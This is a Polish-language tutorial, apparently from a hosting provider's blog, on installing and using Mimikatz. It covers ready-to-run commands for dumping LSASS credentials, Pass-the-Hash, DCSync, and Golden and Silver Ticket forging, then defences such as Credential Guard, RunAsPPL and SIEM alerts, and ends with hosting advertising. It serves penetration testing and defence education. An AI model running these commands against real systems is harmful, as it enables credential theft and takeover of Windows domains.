Jak zainstalować i używać Mimikatz: Kompletny przewodnik dla specjalistów ds. bezpieczeństwa

Mimikatz jest jednym z najbardziej znanych i szeroko omawianych narzędzi w świecie cyberbezpieczeństwa. Pierwotnie opracowany jako proof-of-concept w celu zademonstrowania luk w uwierzytelnianiu Windows, stał się niezbędnym instrumentem w zestawie narzędzi testerów penetracyjnych, red teamerów i badaczy bezpieczeństwa. Ten przewodnik zawiera szczegółowy opis tego, czym jest Mimikatz, kto go używa oraz jak go zainstalować i obsługiwać w sposób odpowiedzialny w kontrolowanym środowisku.

> Zastrzeżenie prawne: Mimikatz może być używany wyłącznie na systemach, które posiadasz lub do testowania których masz wyraźne pisemne upoważnienie. Nieautoryzowane użycie jest nielegalne i może skutkować poważnymi sankcjami karnymi. Ten przewodnik przeznaczony jest wyłącznie do celów edukacyjnych i legalnych testów bezpieczeństwa.

—

Czym jest Mimikatz?

Mimikatz to narzędzie bezpieczeństwa Windows o otwartym kodzie źródłowym, stworzone przez francuskiego badacza bezpieczeństwa Benjamina Delpy’ego. Jego główną funkcją jest wyodrębnianie poświadczeń uwierzytelniania — w tym haseł w postaci jawnej, skrótów NTLM, kodów PIN i biletów Kerberos — bezpośrednio z pamięci systemu Windows (konkretnie z procesu LSASS).

Ponieważ Windows historycznie buforował poświadczenia w pamięci w celu obsługi bezproblemowego uwierzytelniania w różnych usługach, Mimikatz był w stanie ujawnić fundamentalną słabość projektową w sposobie, w jaki system operacyjny obsługiwał wrażliwe dane uwierzytelniania. Microsoft od tamtej pory wprowadził środki zaradcze, takie jak Credential Guard i grupa zabezpieczeń Protected Users, ale Mimikatz nadal ewoluuje wraz z tymi zabezpieczeniami, co czyni go nieocenionym narzędziem referencyjnym do zrozumienia aktualnego krajobrazu zagrożeń.

Kluczowe możliwości Mimikatz

• Wyodrębnianie haseł w postaci jawnej z pamięci Windows (LSASS)
• Zrzucanie skrótów NTLM z bazy danych SAM i Active Directory
• Wyodrębnianie i manipulacja biletami Kerberos (ataki Golden Ticket, Silver Ticket)
• Uwierzytelnianie Pass-the-Hash (PtH) przy użyciu przechwyconych skrótów
• Ataki Pass-the-Ticket (PtT) przy użyciu skradzionych biletów Kerberos
• Ataki DCSync w celu replikacji danych kontrolera domeny bez bezpośredniego dostępu

—

Kto używa Mimikatz i dlaczego?

Legalne przypadki użycia w zakresie bezpieczeństwa

Mimikatz jest używany przede wszystkim przez specjalistów ds. bezpieczeństwa informacji w następujących kontekstach:

• Testy penetracyjne — Symulowanie rzeczywistych ataków kradzieży poświadczeń w celu oceny, jak dobrze zabezpieczenia organizacji wytrzymują atak przeciwnika, który uzyskał wstępny dostęp.
• Operacje red team — Emulowanie technik zaawansowanych trwałych zagrożeń (APT) w celu testowania możliwości wykrywania i reagowania zespołów blue team i analityków SOC.
• Audyty bezpieczeństwa — Ocena, czy hasła i bilety Kerberos są przechowywane i chronione zgodnie z najlepszymi praktykami bezpieczeństwa.
• Szkolenia i świadomość — Demonstrowanie administratorom systemów i inżynierom, jak dokładnie działają ataki oparte na poświadczeniach w praktyce, czyniąc abstrakcyjne zagrożenia namacalnymi i możliwymi do podjęcia działań.
• Badania podatności — Identyfikowanie nowych słabości w mechanizmach uwierzytelniania Windows, zanim złośliwi aktorzy będą mogli je wykorzystać.

Złośliwe nadużycia

Niestety, Mimikatz jest również ulubionym narzędziem wśród cyberprzestępców ze względu na jego skuteczność. Typowe złośliwe przypadki użycia obejmują:

• Ataki Pass-the-Hash — Uwierzytelnianie w systemach przy użyciu przechwyconych skrótów NTLM bez znajomości oryginalnego hasła w postaci jawnej.
• Ataki Pass-the-Ticket — Używanie skradzionych biletów Kerberos do podszywania się pod legalnych użytkowników w sieci.
• Trwałość po eksploatacji — Zbieranie poświadczeń po początkowym naruszeniu w celu przemieszczania się lateralnego przez sieć i eskalacji uprawnień.
• Ataki Golden Ticket — Fałszowanie biletów Kerberos Ticket Granting Tickets (TGT) w celu uzyskania trwałego, niemal nieograniczonego dostępu do zasobów domeny.

Zrozumienie, w jaki sposób atakujący używają Mimikatz, jest dokładnie powodem, dla którego obrońcy muszą być z nim zaznajomieni. Jeśli prowadzisz środowisko VPS Hosting lub zarządzasz dedykowaną infrastrukturą, znajomość tych wektorów ataku pomaga budować bardziej odporne zabezpieczenia.

—

Wymagania wstępne

Przed kontynuowaniem upewnij się, że w Twoim autoryzowanym środowisku testowym spełnione są następujące warunki:

> Najlepsza praktyka: Zawsze wykonuj testy Mimikatz wewnątrz izolowanej maszyny wirtualnej lub dedykowanego serwera laboratoryjnego. Jeśli potrzebujesz bezpiecznego, izolowanego środowiska do laboratoriów testów penetracyjnych, rozważ wdrożenie instancji VPS Hosting z obrazem Windows, aby całkowicie oddzielić testy od infrastruktury produkcyjnej.

—

Krok 1: Pobieranie Mimikatz

1.1 Odwiedź oficjalne repozytorium GitHub

Mimikatz jest utrzymywany jako projekt open-source. Zawsze pobieraj go z oficjalnego źródła, aby uniknąć zmodyfikowanych lub zainfekowanych wersji:

Oficjalne repozytorium: https://github.com/gentilkiwi/mimikatz

1.2 Pobierz najnowsze wydanie

1. Przejdź do sekcji Releases repozytorium (prawy pasek boczny lub przez ścieżkę URL /releases).
2. Znajdź najnowsze stabilne wydanie.
3. Pobierz wstępnie skompilowane archiwum — zazwyczaj nazwane mimikatz_trunk.zip.

1.3 Wypakuj archiwum

1. Kliknij prawym przyciskiem myszy pobrany plik ZIP.
2. Wybierz Wyodrębnij wszystko…
3. Wybierz katalog docelowy, na przykład: C:SecurityToolsMimikatz

Po wypakowaniu znajdziesz dwa podkatalogi:

• x64 — pliki binarne 64-bitowe (używaj na nowoczesnych systemach)
• Win32 — pliki binarne 32-bitowe (dla starszych systemów)

Główny plik wykonywalny, z którym będziesz pracować, to mimikatz.exe.

—

Krok 2: Uruchamianie Mimikatz

2.1 Otwórz wiersz polecenia z podwyższonymi uprawnieniami

Mimikatz wymaga uprawnień administratora do interakcji z chronionymi obszarami pamięci. Aby uruchomić powłokę z podwyższonymi uprawnieniami:

1. Naciśnij Windows + X
2. Wybierz Wiersz polecenia (Administrator) lub Windows PowerShell (Administrator)
3. Kliknij Tak w monicie UAC

2.2 Przejdź do katalogu Mimikatz

cd C:SecurityToolsMimikatzx64

Sprawdź, czy mimikatz.exe jest obecny w tym katalogu:

dir mimikatz.exe

2.3 Uruchom Mimikatz

mimikatz.exe

Jeśli narzędzie uruchomi się pomyślnie, zobaczysz baner Mimikatz i interaktywny monit:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

Monit mimikatz # potwierdza, że narzędzie działa i jest gotowe do przyjmowania poleceń.

2.4 Włącz uprawnienia debugowania

Przed uruchomieniem większości poleceń wyodrębniania poświadczeń podnieś własne uprawnienia Mimikatz w sesji:

mimikatz # privilege::debug

Oczekiwane wyjście:

Privilege '20' OK

Przyznaje to Mimikatz prawo SeDebugPrivilege, które jest niezbędne do odczytu pamięci chronionych procesów, takich jak LSASS.

—

Krok 3: Podstawowe polecenia Mimikatz

3.1 Wyodrębnianie haseł w postaci jawnej z pamięci

Jest to najbardziej znana możliwość Mimikatz. Odczytuje poświadczenia buforowane przez dostawcę uwierzytelniania WDigest bezpośrednio z pamięci LSASS:

mimikatz # sekurlsa::logonpasswords

Co zwraca:

• Nazwy zalogowanych użytkowników
• Nazwy domen
• Hasła w postaci jawnej (jeśli buforowanie WDigest jest włączone)
• Skróty NTLM
• Skróty SHA1
• Poświadczenia Kerberos

> Uwaga: W systemie Windows 8.1 i nowszych Microsoft domyślnie wyłączył buforowanie haseł jawnych WDigest. Jednak atakujący (i testerzy) mogą je ponownie włączyć za pomocą klucza rejestru, dlatego pozostaje to istotnym przypadkiem testowym.

3.2 Wyświetlanie przechowywanych haseł (alternatywne polecenie)

mimikatz # sekurlsa::passwords

To polecenie zapewnia uproszczony widok poświadczeń dostępnych w pamięci systemowej.

3.3 Wyodrębnianie poświadczeń z pliku zrzutu pamięci

Jeśli nie możesz uruchomić Mimikatz bezpośrednio na docelowym systemie, możesz najpierw przechwycić zrzut pamięci LSASS i przeanalizować go w trybie offline:

Utwórz zrzut za pomocą Menedżera zadań:

1. Otwórz Menedżera zadań → zakładka Szczegóły
2. Kliknij prawym przyciskiem myszy lsass.exe → Utwórz plik zrzutu

Lub użyj ProcDump (z Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Analizuj zrzut za pomocą Mimikatz:

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 Wyświetlanie biletów Kerberos

Aby wyliczyć wszystkie bilety Kerberos obecne w bieżącej sesji logowania:

mimikatz # kerberos::list

Aby wyświetlić bilety z pełnymi szczegółami, w tym kluczami sesji:

mimikatz # kerberos::list /export

Eksportuje każdy bilet jako plik .kirbi, który może być użyty w atakach Pass-the-Ticket.

3.5 Eksportowanie poświadczeń do pliku

Aby zapisać wynik zrzutu poświadczeń do pliku tekstowego do późniejszej analizy:

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

Wynik zostanie zapisany do credentials.txt w określonej ścieżce.

—

Krok 4: Zaawansowane techniki Mimikatz

4.1 Atak Pass-the-Hash (PtH)

Pass-the-Hash umożliwia uwierzytelnianie w zdalnym systemie przy użyciu przechwyconego skrótu NTLM, bez potrzeby znajomości hasła w postaci jawnej:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

Tworzy to nowy proces cmd.exe uwierzytelniony jako określony użytkownik przy użyciu skrótu.

4.2 Atak Golden Ticket

Golden Ticket to sfałszowany TGT Kerberos podpisany skrótem hasła konta KRBTGT, przyznający posiadaczowi niemal nieograniczony dostęp do zasobów domeny. Wymaga to skrótu KRBTGT, który można uzyskać przez DCSync:

Krok 1 — DCSync w celu wyodrębnienia skrótu KRBTGT:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Krok 2 — Utwórz Golden Ticket:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Krok 3 — Wstrzyknij bilet:

mimikatz # kerberos::ptt golden.kirbi

4.3 Zrzucanie skrótów NTLM z bazy danych SAM

Aby wyodrębnić skróty kont lokalnych z bazy danych SAM (wymaga uprawnień SYSTEM):

mimikatz # lsadump::sam

4.4 Zrzucanie sekretów z LSA

mimikatz # lsadump::secrets

Pobiera to sekrety LSA, które mogą obejmować poświadczenia kont usług, buforowane poświadczenia domeny i inne wrażliwe dane przechowywane przez Local Security Authority.

4.5 Atak Silver Ticket

Silver Ticket celuje w konkretną usługę, a nie w całą domenę. Wymaga skrótu NTLM docelowego konta usługi:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Krok 5: Środki zaradcze w zakresie obrony

Zrozumienie, jak działa Mimikatz, to tylko połowa równania. Druga połowa to wiedza, jak się przed nim bronić. Jeśli zarządzasz serwerami Windows — czy to na Serwerach Dedykowanych, czy na infrastrukturze chmurowej — następujące środki zaradcze są kluczowe:

5.1 Włącz Credential Guard

Windows Credential Guard używa zabezpieczeń opartych na wirtualizacji (VBS) do izolowania LSASS w chronionym kontenerze, uniemożliwiając Mimikatz bezpośrednie odczytywanie poświadczeń z pamięci.

Włącz przez Zasady grupy:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Wyłącz uwierzytelnianie WDigest

Zapobiegaj buforowaniu haseł w postaci jawnej przez wyłączenie WDigest:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Dodaj użytkowników do grupy Protected Users

Członkowie grupy zabezpieczeń Protected Users nie mogą uwierzytelniać się przy użyciu szyfrowania NTLM, DES lub RC4 Kerberos, co znacznie ogranicza skuteczność ataków kradzieży poświadczeń.

5.4 Wdróż ochronę LSA (RunAsPPL)

Włącz Protected Process Light (PPL) dla LSASS, aby zapobiec nieautoryzowanemu dostępowi do pamięci:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Monitoruj wskaźniki Mimikatz

Skonfiguruj swoje rozwiązanie SIEM lub EDR, aby alertować na:

• Dostęp do pamięci lsass.exe z nieoczekiwanych procesów
• SeDebugPrivilege przyznawane procesom niebędącym systemowymi
• Podejrzane wzorce poleceń sekurlsa, kerberos lub lsadump w dziennikach procesów
• Nietypowe zdarzenia tworzenia pliku zrzutu LSASS (Event ID 4656, 4663)

5.6 Utrzymuj systemy zaktualizowane

Wiele technik Mimikatz wykorzystuje znane podatności lub starsze zachowania. Utrzymywanie Windows i Active Directory w pełni zaktualizowanych eliminuje całe klasy wektorów ataku.

—

Mimikatz w kontekście bezpiecznej infrastruktury hostingowej

Dla organizacji prowadzących aplikacje internetowe, API lub usługi wewnętrzne, ryzyko kradzieży poświadczeń wykracza poza lokalną stację roboczą. Jeśli atakujący uzyska dostęp do środowiska serwerowego, narzędzia takie jak Mimikatz mogą być używane do eskalacji uprawnień i przemieszczania się lateralnego.

Wybór dostawcy hostingu, który priorytetowo traktuje bezpieczeństwo na poziomie infrastruktury, jest ważną warstwą obrony. Niezależnie od tego, czy potrzebujesz Współdzielonego Hostingu WWW dla mniejszych projektów, czy Serwerów Dedykowanych dla obciążeń korporacyjnych, zapewnienie, że środowisko hostingowe obejmuje ochronę DDoS, izolację sieci i regularne aktualizacje zabezpieczeń, zmniejsza ogólną powierzchnię ataku.

Dla zespołów zarządzających środowiskami Active Directory lub aplikacjami opartymi na Windows, połączenie infrastruktury z odpowiednio skonfigurowanymi Certyfikatami SSL zapewnia, że poświadczenia przesyłane między klientami a serwerami są szyfrowane podczas transmisji — dodając kolejną warstwę ochrony przed przechwyceniem.

—

Podsumowanie: Dokumentacja poleceń Mimikatz

—

Podsumowanie

Mimikatz pozostaje jednym z najpotężniejszych i najbardziej pouczających narzędzi dostępnych dla specjalistów ds. cyberbezpieczeństwa. Jego zdolność do ujawniania fundamentalnych słabości w mechanizmach uwierzytelniania Windows przyczyniła się do znaczących ulepszeń w sposobie, w jaki Microsoft projektuje ochronę poświadczeń — od Credential Guard po Protected Users po LSA PPL. Dla testerów penetracyjnych, red teamerów i badaczy bezpieczeństwa dogłębne zrozumienie Mimikatz nie jest opcjonalne; jest niezbędne.

Kluczowe zasady, o których należy zawsze pamiętać:

• Zawsze uzyskuj wyraźne pisemne upoważnienie przed użyciem Mimikatz na jakimkolwiek systemie.
• Używaj izolowanych środowisk — maszyn wirtualnych lub dedykowanych serwerów laboratoryjnych — aby uniknąć przypadkowego ujawnienia.
• Rozumiej zabezpieczenia tak głęboko, jak rozumiesz ataki.
• Bądź na bieżąco — zarówno Mimikatz, jak i zabezpieczenia Windows stale ewoluują.

Łącząc praktyczną wiedzę o narzędziach takich jak Mimikatz z bezpieczną, dobrze skonfigurowaną infrastrukturą hostingową, zespoły ds. bezpieczeństwa mogą budować zabezpieczenia, które są rzeczywiście testowane pod kątem rzeczywistych technik ataku, a nie teoretycznych założeń.

—

*AlexHost zapewnia bezpieczne, wysokowydajne rozwiązania hostingowe zaprojektowane z myślą o profesjonalistach świadomych bezpieczeństwa. Zapoznaj się z naszymi planami VPS Hosting i Serwerami Dedykowanymi, aby zbudować swoje następne bezpieczne środowisko laboratoryjne lub produkcyjne.*